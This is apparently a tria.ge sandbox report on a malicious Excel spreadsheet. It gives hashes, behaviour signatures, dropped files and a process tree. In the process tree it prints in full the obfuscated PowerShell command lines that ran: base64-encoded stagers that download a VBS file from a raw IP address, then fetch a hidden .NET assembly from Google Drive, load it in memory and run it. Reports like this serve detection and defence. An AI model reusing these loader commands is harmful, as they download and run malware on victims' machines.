Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    101s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    07/11/2024, 03:18

General

  • Target

    d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls

  • Size

    1.1MB

  • MD5

    9b8d94907c2db1b8ae9ebf84b2099c16

  • SHA1

    d543e02897263288f2b2a65d7070757d99fed8ff

  • SHA256

    d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6

  • SHA512

    cc8d24cee7a41c7cc2ddab9cd5d7ae6b245dcd90fee8b5de1d4001dae83e7c43d3cbd474bc1c4f89fa9ec903d26de680630d8b064328f07b3a04cf827182a972

  • SSDEEP

    24576:1yaZxvseowaDI9eqvBw2LyifZSScF1LelExbgwCcH0p1O4uGqdzkxTm:1T0DIRvBwCv0xF1L3MwCA4uIx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:840
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Windows\SysWOW64\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE
      "C:\Windows\SYsTEM32\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE" "pOWErsheLl.exE -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE ; IeX($(IEx('[syStEm.tEXt.ENcoDing]'+[ChaR]58+[char]58+'Utf8.getStRInG([SYStEm.CONVERT]'+[CHaR]0x3a+[cHaR]0x3A+'fROmbASe64stRinG('+[cHar]0x22+'JEE5QjJqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9OLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRwY1VPTmRSLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdjWFpDLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRNVXVCLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNdGZMc256LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEliQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImRkUGJnTElwWEIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVTUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEthSXZOWFFvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBOUIyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNDYvMjE3L3NlZXRoZWJlc3R0aGluZ3N3aXRoZ29vZG5ld3NnaXZlbm1lZ3JlYXR3YXlzLnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdvb2RuZXdzZ2l2ZW5tZWdyZWF0dy52YnMiLDAsMCk7U1RBcnQtU2xFZXAoMyk7c1RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aXRoZ29vZG5ld3NnaXZlbm1lZ3JlYXR3LnZicyI='+[ChAr]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2428
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2652
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xnxpjgur.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1636
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5BF6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5BE6.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1932
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodnewsgivenmegreatw.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1724
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzaG9NRVsyMV0rJFBzaG9NZVszNF0rJ3gnKSggKCc3eicrJ3hpbWFnZVVybCA9IEs5a2h0dHBzOi8vZHJpdicrJ2UuZ29vZ2xlLmNvbS91Yz9leHBvcnQnKyc9ZG93bmxvYWQmaWQ9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIEs5azs3eicrJ3h3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OZXQuJysnV2ViQ2xpZW50Ozd6eGknKydtYWdlQnl0JysnZXMgPSA3eicrJ3h3ZWJDbGllbnQuRG93bmxvYWREYXRhKDd6eGltYWdlVXJsKTs3enhpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg3enhpbWFnZUJ5dGVzKTs3enhzdGFydEZsYWcgPSBLOWs8PEJBU0U2NF9TVEFSVD4+SzlrOzd6eGUnKyduZEZsYWcgPSBLOWs8PEJBU0U2NF9FTkQ+Pks5azs3enhzdGFydEluZGV4ID0gN3p4aW1hZ2VUZXh0LkluZGV4T2YoN3p4c3RhcnRGbGFnKTsnKyc3enhlbmRJbmRleCA9IDd6eGltYWdlVGV4dC5JbmRleE9mKDd6JysneGVuZEZsYWcpOzd6eHN0YXJ0SW5kZXggLWcnKydlIDAgLWFuZCA3JysnenhlbmRJbicrJ2RleCAtZ3QgN3onKyd4c3RhcnRJbmQnKydleDs3enhzdGFydEluZGV4ICs9IDd6eHN0YXJ0RmxhZy5MZW5ndGg7N3p4YmFzZTYnKyc0TGVuZ3RoID0gN3p4ZW5kJysnSW5kZXggLSA3enhzdGFydEluZCcrJ2UnKyd4Ozd6eGJhc2U2NENvbW1hbmQnKycgPSA3enhpbWFnZVQnKydleHQuU3Vic3RyaW5nKDd6eHN0YXJ0SW5kZXgsJysnIDd6eGJhc2U2NExlbmd0aCk7N3p4YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoN3p4YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGFDeCBGb3JFYWNoLU9iamVjdCB7IDd6eF8gfSknKydbLTEuLi0oN3p4YmFzZTY0Q29tbWFuZC5MZScrJ25ndGgpXTs3enhjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDd6JysneGJhc2U2NFJldmVyc2VkKTs3enhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdCcrJ2lvbi5Bc3NlbWJseV06OicrJ0xvYWQoN3p4Y29tbWFuZEJ5dGVzKTs3enh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKEs5a1ZBSUs5ayk7N3p4dmFpTWV0aG9kLkludm9rZSg3enhudWxsLCBAKEs5a3R4dC5SUklNTUEnKydDLzcxMi82NDEuMzkxLjMuMjkxLy86cCcrJ3R0aEs5aywgSzlrZGVzYXRpdmFkb0s5aywgSzlrZGVzYXRpdmFkJysnb0s5aywgSzlrZGVzYXRpdmFkb0s5aywgSzlrYXNwbmV0X2NvbXBpbGVySzlrLCBLOWtkZXNhdGl2YWRvSzlrLCAnKydLOWtkJysnZXNhdGl2YWRvSzlrLEs5a2Rlc2F0aXZhZG9LOWssSzknKydrZGVzYScrJ3RpdmFkb0s5ayxLOWtkZXNhdGl2YWQnKydvSzlrLEs5a2Rlc2F0aXZhZG9LOWssSzlrZGUnKydzYXRpdmFkb0s5ayxLOWsxSzlrLEs5a2Rlc2F0aXZhZG9LOWspKTsnKS5SRXBsYUNFKCdhQ3gnLFtTVFJJbmddW0NIQVJdMTI0KS5SRXBsYUNFKChbQ0hBUl03NStbQ0hBUl01NytbQ0hBUl0xMDcpLFtTVFJJbmddW0NIQVJdMzkpLlJFcGxhQ0UoJzd6eCcsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:964
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pshoME[21]+$PshoMe[34]+'x')( ('7z'+'ximageUrl = K9khttps://driv'+'e.google.com/uc?export'+'=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 K9k;7z'+'xwebClient = New-Object Sys'+'tem.Net.'+'WebClient;7zxi'+'mageByt'+'es = 7z'+'xwebClient.DownloadData(7zximageUrl);7zximageText = [System.Text.Encoding]::UTF8.GetString(7zximageBytes);7zxstartFlag = K9k<<BASE64_START>>K9k;7zxe'+'ndFlag = K9k<<BASE64_END>>K9k;7zxstartIndex = 7zximageText.IndexOf(7zxstartFlag);'+'7zxendIndex = 7zximageText.IndexOf(7z'+'xendFlag);7zxstartIndex -g'+'e 0 -and 7'+'zxendIn'+'dex -gt 7z'+'xstartInd'+'ex;7zxstartIndex += 7zxstartFlag.Length;7zxbase6'+'4Length = 7zxend'+'Index - 7zxstartInd'+'e'+'x;7zxbase64Command'+' = 7zximageT'+'ext.Substring(7zxstartIndex,'+' 7zxbase64Length);7zxbase64Reversed = -join (7zxbase64Command.ToCharArray() aCx ForEach-Object { 7zx_ })'+'[-1..-(7zxbase64Command.Le'+'ngth)];7zxcommandBytes = [System.Convert]::FromBase64String(7z'+'xbase64Reversed);7zxloadedAssembly = [System.Reflect'+'ion.Assembly]::'+'Load(7zxcommandBytes);7zxvaiMethod = [dnlib.IO.Home].GetMethod(K9kVAIK9k);7zxvaiMethod.Invoke(7zxnull, @(K9ktxt.RRIMMA'+'C/712/641.391.3.291//:p'+'tthK9k, K9kdesativadoK9k, K9kdesativad'+'oK9k, K9kdesativadoK9k, K9kaspnet_compilerK9k, K9kdesativadoK9k, '+'K9kd'+'esativadoK9k,K9kdesativadoK9k,K9'+'kdesa'+'tivadoK9k,K9kdesativad'+'oK9k,K9kdesativadoK9k,K9kde'+'sativadoK9k,K9k1K9k,K9kdesativadoK9k));').REplaCE('aCx',[STRIng][CHAR]124).REplaCE(([CHAR]75+[CHAR]57+[CHAR]107),[STRIng][CHAR]39).REplaCE('7zx','$') )"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1512

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

    Filesize

    1KB

    MD5

    3e652ebfb9e701d6bd515f81d762331d

    SHA1

    46cc56c7a8d342f3fa14d7ceb19b4d48a699072e

    SHA256

    9d1b4927244aa7e9cf87639c48fa5a5bea959765680f195ca6253f62792e122d

    SHA512

    a2c4859b5c6363968478851fdb4e8098535c0bcc0f6fab48252536898141d72fdf1ec4b14a1f75817bee457eaac662ce6f95be785c0745763e4f82998614a8e9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

    Filesize

    2KB

    MD5

    66b8e52f6d682ffbbb3baca244831960

    SHA1

    a6f6336d059949a32273a491a8b99832804770a3

    SHA256

    8fb788a5d531dc1bface8c316635c407b96b881a1dc65812d63e13095d784aad

    SHA512

    af041ecbc4385b6df1b0618e7b3a22de0e51c94907c053d84cd80518d18e9b8b4009f4771581e7ddf14891569054d9173a0a39fd3cc2b64a244513915fcbf92f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

    Filesize

    1KB

    MD5

    cc0416733fe9f2211840ff355ceb5fad

    SHA1

    17b801484ecda2a3badb814e02d56b11ca768d81

    SHA256

    b0cd53b7f50a9d79caa2e78864aab2bc68d115cb35829a2b451ca653a7e26481

    SHA512

    30db6ef8a485076dca3f76848bd4e0d55e480c7b868fb03f44cd95ab381d83f36ab228acd6a97d71a5d4d0c1d9bced9e9ff9e1971314051c3f8316108bae4943

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F53EB4E574DE32C870452087D92DBEBB_2EEDDB29953A46217D3D6BE21EA36A5B

    Filesize

    471B

    MD5

    8955bb560abf515e94ca68dd87ef93b4

    SHA1

    edfe758796fd694f425d843c9d68689485743a4d

    SHA256

    e8da732b763426bd055a381d3647dc506f3c5d14fe0bf6e0b174c2365306c3c4

    SHA512

    ce74e7a1fd0b5baa6781d54dca087e81b8f9f68582ca935a40fd235510ed15ce8351561d8bda74f584a01225e63e5bcf99dd16953c8efb03064435aad7153173

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

    Filesize

    434B

    MD5

    5f92c2caa4bcd2061af1d8656ec4ad7d

    SHA1

    72ec7878aac542fe23da4b1926c7298adf2ebd78

    SHA256

    f822c5c53c6bb3c31c7106b420ff2f717e3c4b25d5bb181d2e17ae8849886210

    SHA512

    181aa54110c84fb0f6a69d0af9df437ddbc2823a729f25b5bbf0016d6d834d6587acb3c5c70679c6dd091ac321389593fa0b944842c8f453306130e9c98b6867

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    e4f18e168d45a34999bbc72a47fb4c72

    SHA1

    32540425d1e4b040dcac255e27bba392a154528b

    SHA256

    671efce174efe9bbf2b581c14524762d36af43ce1824fae84ab6afb0970325aa

    SHA512

    12ecc1fb0619a0d499c7c9399dca467298adcbeee1fa0adb8291bd4e12af7fe3cb1df7c9b90b35655d37753f7ac62bac540f454cc4e0886f70c0ae5bef01d4fc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    11beaa8c508c0d9b13fddeca4daaf6ab

    SHA1

    67a150ad5039dfc5145e7a20bf3346ad2be71ece

    SHA256

    6f765e3805d1cd0e5eb35b42458694c6c1b6cca6ed2e31f04f25bed6655a3d42

    SHA512

    319de834b06e57064cfe7dbea1de4c9c8df578eca45c328f25e4891f6a81fc0597dd220c920cdca6ec6ea08d9313a4def5fe6972f0aa854cfdf20ccb8e55461f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

    Filesize

    458B

    MD5

    3006b04e64f5a2a1f7d8d4d5fe9e165f

    SHA1

    48ee99c8e4eac0950c7e284aa73c03290bfdd7da

    SHA256

    c9c77de0dd1b3a25d26685945d5cfe4bcda2002ee828d42c79e041fc10bd39f7

    SHA512

    24a21f4ac32089a9c442f2bbbab7c75c0cb7f6bf58932421ef46c8b523195e536520fa615795f0f2ce48b111906135f106d4d7043ba9c61711e14dd24a8fac45

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

    Filesize

    432B

    MD5

    8926de42b009c839ba6fee717e05224c

    SHA1

    96e282be739b499206c7e59308ca5db916a53f58

    SHA256

    68762245efc87ee716b7dfa8a54cedc243894300084c2096a391f9bf9d1f0891

    SHA512

    1bfdc869fb466b5b9cd4b4b8342d68eefac50e203e987f3e13b7a87ea685d21e276afeca46d37fdb31eebed2e5288bca6cde47107f63ed772db099d1b40a5f1a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F53EB4E574DE32C870452087D92DBEBB_2EEDDB29953A46217D3D6BE21EA36A5B

    Filesize

    426B

    MD5

    9c7b1b244d1c1f3b0bbccc1bddc3886e

    SHA1

    dea53c150d7e95d3f1d8302ba2da717067c162e9

    SHA256

    8fecf362484ca2c904ac0f1020c92eb1d8d1fa0789865b9d213aac657df3641c

    SHA512

    68c1f513267379d91b965671d95f9d27e615bc23f1aef13965c2a24bda8d651e9906113572a5b741c6132bc139efd95b74bb246f24db598f046044abd7efef19

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\wecreatdbestthingswithgreatthingsentiretimeeverywheregoodhappy[1].hta

    Filesize

    8KB

    MD5

    552093c811bbc7be144296b66144b9a2

    SHA1

    67377ed35b84dd08b6bd1612d20379cc31482e18

    SHA256

    92251c4a9e0172e074c732ed052251b68d15843b00b466dc233fcb211ec02140

    SHA512

    0bb1ccee11b257097ca5e828fcdb02ea6b4283975bfa17bc6a86b579d020177a33c30b7f9fff27157caa03b1ffc52e1929633a322180fafaac680f252dae979a

  • C:\Users\Admin\AppData\Local\Temp\Cab396B.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RES5BF6.tmp

    Filesize

    1KB

    MD5

    ef5768950f2875616adf4d81e5cd5e70

    SHA1

    60a79022128e0a83e5812bfdeae6eae9785fae15

    SHA256

    83f8749d231a7322f176e54f045e7be2e5c1e2012e7d4671870822db8306f319

    SHA512

    c4ef5c4a87e772574be663f9f17e60f0bd6815af47b7e115b601251ad1268b4eeff0e596405046d911bce735833e3233db4b7713a5ddf2e534e762e81039dbda

  • C:\Users\Admin\AppData\Local\Temp\Tar39AC.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\xnxpjgur.dll

    Filesize

    3KB

    MD5

    531065ae2d5daf7ae6451d4fc92089b9

    SHA1

    5bd651a33fdb35d4ac2ddd67017987d88b08df6d

    SHA256

    3a1dc84c172e336ac691cf84a07cc45096eeee4a813cfc14e2698d6ac16af1f2

    SHA512

    41eec43babc83b4f67cee5a3b47f0dc7f08883df04810e19aa664024ee04f51a1f95e39b86ffffccb4ca4cc3a6fa5df4ca5fdb16c52272590f399aa7dee5cf32

  • C:\Users\Admin\AppData\Local\Temp\xnxpjgur.pdb

    Filesize

    7KB

    MD5

    656b5ac6898936eca869fece1c306ff5

    SHA1

    b453b8b956d99b48e2ce9a85f607771af118b35a

    SHA256

    d790bd338643a28fe110bfe167631733d4cf38f5c9d65a13c733cd120649d16d

    SHA512

    10a04bc75e61b2633fb9201fa123a9f2d98b405b62aaef3b97ae96a3abd514a917d81ac91af8cd804e2d7574eeef8d75bed8c7de86447fd10197b432905d2290

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    0414348e057db42f478bb8407d9b90a2

    SHA1

    5784088e389bd705137236180f74d9718ff9dfd3

    SHA256

    9ae64645e7960b28d06bffa2e77ff5cb64c60a5ac679a36dc3210e2d0a972955

    SHA512

    4016f24e4acfbb49c967168ca1da4f932d953cac51e9ee31a665ff181dfe0dac8967eee7c23dc67f3f59e91bd074b0162cff7699dc21462876b6b5f193e5b19a

  • C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodnewsgivenmegreatw.vbs

    Filesize

    138KB

    MD5

    6d668e698465e2b247c18af64cd92768

    SHA1

    9f0d8dc1bf9863ce10df0779404b46f11e05878e

    SHA256

    ebe21b018238666a7386c805e391635b4a6a1397be0cebcc1cd1a0b4c2a9ac03

    SHA512

    53d6e582ad8ab0a373183e4825a829ab9788dcd965b76912b2666a0ad6e17233f100a2c9916fc9bb36c6034a4b21588ac26793f87f7f66b2f5037652ea989d8e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC5BE6.tmp

    Filesize

    652B

    MD5

    a907c6e7244ccf755cfed07ec584cc6a

    SHA1

    dfa1e039f71381da85a85613f651f0598b6e7586

    SHA256

    efdf5a80e519f177be02d507f02e7fc05f0a2b609e373cbff6dd76ab86bac56d

    SHA512

    3302de3cea1463d818a6cb67f7eea49b4a55dae126fac68a4f32e87bdac1d8f4eee474eaffe159c35a91553ff9de1f2774c2a9611510fb39e590aea541b46f90

  • \??\c:\Users\Admin\AppData\Local\Temp\xnxpjgur.0.cs

    Filesize

    483B

    MD5

    0d07f4ab30ba01353f767eca7b280b1a

    SHA1

    b5b6d65652a490f5eeeaf899884cec55cc09d455

    SHA256

    f7082f6db40c262a4b1f34cbf2e9a8ed8a97090e49968d630cb087d1a62ef31e

    SHA512

    001b1bd234cf1f9dacf6fa54fad0857277c4c349c2f615fb4f6d2c1dc064a249594aedb1c9587a7f1eba1de1a9aa825e5f415248ddc9379475723105524165a3

  • \??\c:\Users\Admin\AppData\Local\Temp\xnxpjgur.cmdline

    Filesize

    309B

    MD5

    1bdbbcf115196413a053f2345bef4da9

    SHA1

    31b85ebec8867e1a38d66764b71e24675bb05157

    SHA256

    f65f215290355666e8c8b80baaf89dc3f153c0aa25deefc56e14f313a66c4ea5

    SHA512

    b087ebe9ca81f8333940f247de694cfe721a82dda98a505dea4ef9a7ff66a6de47af3d70bcce4995faea831eb5654f87b4261ae4785ab28a2628eac63745cf42

  • memory/840-136-0x0000000002F80000-0x0000000002F82000-memory.dmp

    Filesize

    8KB

  • memory/840-165-0x000000007261D000-0x0000000072628000-memory.dmp

    Filesize

    44KB

  • memory/840-1-0x000000007261D000-0x0000000072628000-memory.dmp

    Filesize

    44KB

  • memory/840-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2540-135-0x0000000002C00000-0x0000000002C02000-memory.dmp

    Filesize

    8KB